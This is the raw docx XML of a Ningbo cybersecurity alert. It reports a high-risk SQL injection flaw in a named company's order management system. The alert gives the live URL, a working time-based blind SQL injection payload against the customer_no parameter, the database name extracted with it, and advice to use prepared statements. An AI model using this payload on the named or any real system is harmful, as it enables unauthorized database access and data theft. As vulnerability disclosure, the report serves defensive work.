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B4BC" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>宁波市网络安全预警通报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029197EC" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="0030061E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="1" w:color="FF0000"/>
        </w:pBdr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267DE385" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/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kern w:val="2"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E344B" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞事件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878FCF5" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>信仓（浙江）科技有限公司所属订单管理系统存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D296F" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现时间：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B466A" w14:textId="53A88008" w:rsidR="0030061E" w:rsidRDefault="000D20ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62492819" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>影响产品：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B942DE3" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>信仓（浙江）科技有限公司所属订单管理系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB11908" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A3142" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>宁波网信办安全监测测试信仓（浙江）科技有限公司所属订单管理系统存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>注入漏洞，经测试，该漏洞情况属实。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E07370" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>影响危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB96DF2" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="156"/>
        <w:ind w:left="420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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBCA16" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>验证情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26447A7F" w14:textId="2A9CF58E" w:rsidR="0030061E" w:rsidRDefault="00000000" w:rsidP="00686184">
      <w:pPr>
        <w:ind w:left="270" w:firstLine="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>URl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.jscomp.cn/web/database/manager </w:t>
      </w:r>
      <w:r w:rsidR="00275E9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62851F5A" wp14:editId="106DA3FF">
            <wp:extent cx="5274310" cy="2499995"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 10">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA0309-C3DD-540D-05A1-EBBC84FDBA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>
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA0309-C3DD-540D-05A1-EBBC84FDBA8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1F13" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="270" w:hanging="270"/>
        <w:jc w:val="left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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>验证截图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0D393" w14:textId="6E9250EC" w:rsidR="0030061E" w:rsidRDefault="00000000" w:rsidP="00686184">
      <w:pPr>
        <w:ind w:left="270" w:firstLine="150"/>
        <w:jc w:val="left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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>当前数据库长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，延时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>customer_no=001' and (select*from(select sleep(if(length(database())=3,2,0)))a/**/union/**/select+1)='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>第一个字母是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>第二个字母是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>第三个字母是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>当前数据库名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>wms</w:t>
      </w:r>
      <w:r w:rsidR="00275E9B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E375F9F" wp14:editId="2B165A0D">
            <wp:extent cx="5274310" cy="3407410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13611264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26458" name="图片 13611264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26EA" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>处置措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F399BDA" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000" w:rsidP="00293A6B">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>对数据库查询语句进行过滤且采用合理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CC08D" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="156"/>
        <w:ind w:left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7A13D090" wp14:editId="6535215E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>137795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5467350" cy="635"/>
                <wp:effectExtent l="9525" t="10160" r="10160" b="9525"/>
                <wp:wrapNone/>
                <wp:docPr id="1001" name="自选图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20" cy="720"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:pr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自选图形 16" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:0pt;margin-left:-7.5pt;margin-top:10.85pt;height:0.05pt;width:430.5pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:allowincell="f" o:gfxdata="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FgAAAGRycy9QSwECFAAUAAAACACHTuJA/KFwhdgAAAAJAQAA&#10;DwAAAAAAAAABACAAAAA4AAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQGFEK2/KAQAA&#10;eQMAAA4AAAAAAAAAAQAgAAAAPQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHkFAAAA&#10;AA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1.50236220472441pt" color="#000000" joinstyle="round"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0030061E">
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="0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652DA" w14:textId="77777777" w:rsidR="00751505" w:rsidRDefault="00751505">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D4D69D7" w14:textId="77777777" w:rsidR="00751505" w:rsidRDefault="00751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CJK SC">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default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6BB0E" w14:textId="77777777" w:rsidR="00751505" w:rsidRDefault="00751505">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A094DCD" w14:textId="77777777" w:rsidR="00751505" w:rsidRDefault="007515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4D1FC" w14:textId="77777777" w:rsidR="0030061E" w:rsidRDefault="0030061E">
    <w:pPr>
      <w:pStyle w:val="ac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4DF6FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4DF6FB3"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="FFDE6A74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFDE6A74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 w16cid:durableId="53748298">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="727075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proofState w:spelling="clean" w:grammar="clean"/>
  <w:defaultTabStop w:val="4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061E"/>
    <w:rsid w:val="BD5E182B"/>
    <w:rsid w:val="BDB1781D"/>
    <w:rsid w:val="F973C6CD"/>
    <w:rsid w:val="F97B792E"/>
    <w:rsid w:val="FBFD3AFE"/>
    <w:rsid w:val="FF3B07BF"/>
    <w:rsid w:val="FFF80B15"/>
    <w:rsid w:val="000456F2"/>
    <w:rsid w:val="00084146"/>
    <w:rsid w:val="000D20ED"/>
    <w:rsid w:val="00275E9B"/>
    <w:rsid w:val="00293A6B"/>
    <w:rsid w:val="002B51FB"/>
    <w:rsid w:val="0030061E"/>
    <w:rsid w:val="004152A8"/>
    <w:rsid w:val="005669CC"/>
    <w:rsid w:val="00686184"/>
    <w:rsid w:val="00751505"/>
    <w:rsid w:val="008604B0"/>
    <w:rsid w:val="008C39AD"/>
    <w:rsid w:val="00AE6603"/>
    <w:rsid w:val="00B90C40"/>
    <w:rsid w:val="00BA50F7"/>
    <w:rsid w:val="00C908CE"/>
    <w:rsid w:val="00D6589B"/>
    <w:rsid w:val="00E1200E"/>
    <w:rsid w:val="29ADCB54"/>
    <w:rsid w:val="3AB5B729"/>
    <w:rsid w:val="4BD3A346"/>
    <w:rsid w:val="5F7D99A1"/>
    <w:rsid w:val="7D5BD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4747D08"/>
  <w15:docId w15:val="{90EE1F2D-E01C-784A-A0C4-EA0E8F5BC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uiPriority="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uppressAutoHyphens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0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sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat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Number"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans CJK SC"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="header"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="List"/>
